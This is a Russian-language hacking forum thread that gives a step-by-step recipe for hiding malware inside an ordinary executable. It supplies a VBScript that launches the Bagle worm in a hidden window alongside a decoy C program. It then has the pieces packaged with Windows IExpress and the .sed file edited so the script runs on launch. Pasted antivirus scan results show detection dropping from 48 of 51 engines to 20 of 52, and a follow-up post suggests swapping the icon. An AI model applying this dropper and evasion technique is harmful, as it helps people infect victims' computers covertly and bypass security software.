Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare
Показано с 1 по 3 из 3
  1. #1
    TopicStarter
    Аватар для sata-ata

    Статус
    Offline
    Регистрация
    29.10.2013
    Сообщений
    3,035
    Репутация
    282 + / -
    Программист

    прячем вредоноса в любом exe

    откопал тут старый способ)

    на удивление метод легален и встроен в винду
    берём какой-нить ехе, например, [Только зарегистрированные могут видеть это. ] (чистый, но вот вам на всякий случай [Только зарегистрированные могут видеть это. ])

    степень 2 на си


    з.ы. только откомпилил, а вт нашёл 5 из 52 XD
    c код:

    #include <iostream>
    #include <windows.h>

    using namespace std;

    int main() {
    __int64 a=1;
    int n=64;
    for (int i=1; i<n; i++)
    {
    a*=2;
    cout << i << " " << a << "\n";
    }
    system ("pause");
    }

    [свернуть]


    и какой-нить зловред, например, червячёк [Только зарегистрированные могут видеть это. ] ([Только зарегистрированные могут видеть это. ] (48 из 51))

    перемещаем всё на рабочий стол
    рядом создаём sbd.vbs:
    vb код:

    Set wshshell = WScript.CreateObject("WScript.Shell")
    wshshell.run "2.exe", 1, False
    wshshell.run "Win32.Bagle.CY.exe", 0, False


    собсно наш скрипт просто запускает эти проги
    wshshell.run имя_проги, отображать(1)_или_нет(0)_окно_ проги, ждать(True)_или_нет(False)_закрыт ия_перед_следующим_действи м

    а теперь великая встроенная вещь по имени iexpress:

    жмём Win+R, затем пишем iexpress

    1. далее
    2. далее
    3. любое название
    4. далее
    5. далее
    6. добавлием наши файлы для объединения в пакет (зловред, 2.ехе и vbs)
    7. выбираем прогу при старте, любую, лучше 2.ехе
    8. далее
    9. далее
    10. указываем рабочий стол для сохранения пакета
    11. галку на "не перезагружать"
    12. далее
    13. далее


    должны появиться 2 файла
    бла-бла.sed
    бла-бла.exe

    лезем в sed ищем
    Код:
    AppLaunched=2.exe
    меняем на
    Код:
    AppLaunched=sbd.vbs
    (наш скрипт)

    снова
    жмём Win+R, затем пишем iexpress
    но теперь выбираем .sed, сразу после запуска
    и пересоздаем пакет на основе нового sed

    усё)

    з.ы. [Только зарегистрированные могут видеть это. ] нового .exe... нам сбросили до 20 / 52
    и я поражён рзультатами!!!

    вэтэ кому лень


    AVG I-Worm/Bagle 20140501
    Ad-Aware [email protected] 20140501
    Agnitum Trojan.DL.Bagle.EG 20140501
    AntiVir TR/Bagle.DF 20140501
    Antiy-AVL Trojan/Win32.Llac 20140501
    Avast Win32:Beagle-EG [Wrm] 20140501
    ClamAV Worm.Bagle.Gen-5 20140501
    Commtouch W32/Mitglieder.WINF-4156 20140501
    DrWeb Win32.HLLM.Beagle.35146 20140501
    ESET-NOD32 Win32/Bagle.CY 20140501
    F-Prot W32/Mitglieder.FT 20140501
    F-Secure [email protected] 20140501
    Ikarus Win32.Tupac.A 20140501
    K7GW EmailWorm ( 00003b091 ) 20140501
    Kaspersky Email-Worm.Win32.Bagle.pac 20140501
    MicroWorld-eScan [email protected] 20140501
    NANO-Antivirus Trojan.Win32.Agent.bobmol 20140501
    Norman Heuristic_Suspicious.gen!r 20140501
    Qihoo-360 Trojan.Generic 20140501
    VIPRE Trojan.Win32.Generic.pak!cobra 20140501
    AegisLab 20140501
    AhnLab-V3 20140501
    Baidu-International 20140501
    BitDefender 20140501
    Bkav 20140428
    ByteHero 20140501
    CAT-QuickHeal 20140430
    CMC 20140429
    Comodo 20140501
    Emsisoft 20140501
    Fortinet 20140430
    GData 20140501
    Jiangmin 20140501
    K7AntiVirus 20140501
    Kingsoft 20140501
    Malwarebytes 20140501
    McAfee
    20140501
    McAfee-GW-Edition
    20140501
    Microsoft
    20140501
    Panda
    20140501
    Rising 20140501
    SUPERAntiSpyware 20140501
    Sophos 20140501
    Symantec 20140501
    TheHacker 20140501
    TotalDefense 20140501
    TrendMicro 20140501
    TrendMicro-HouseCall 20140501
    VBA32 20140428
    ViRobot 20140501
    Zillya 20140501
    nProtect 20140430
    [свернуть]

    з.з.ы. в этом sed очень много настроек, как и в самом iexpress


    by [Только зарегистрированные могут видеть это. ], он же s0a
    Последний раз редактировалось sata-ata; 02.05.2014 в 04:07.
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

    с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

  2. 5 пользователя(ей) сказали cпасибо:
  3. #2
    TopicStarter
    Аватар для sata-ata

    Статус
    Offline
    Регистрация
    29.10.2013
    Сообщений
    3,035
    Репутация
    282 + / -
    Программист
    ну и конечно
    как изменить иконку .exe
    существует множество прог и способов для этого
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

    с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

  4. #3
    TopicStarter
    Аватар для sata-ata

    Статус
    Offline
    Регистрация
    29.10.2013
    Сообщений
    3,035
    Репутация
    282 + / -
    Программист
    ап в топ =)
    8AC4F56356469F79B5283364053ACDA49D8EC9FEFDADC2B42F A5B4E979D9222267583F350BF9

    с/delphi/pascal/vbs/vbm/bat
    Ник зареган, суки! [Только зарегистрированные могут видеть это. ]

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.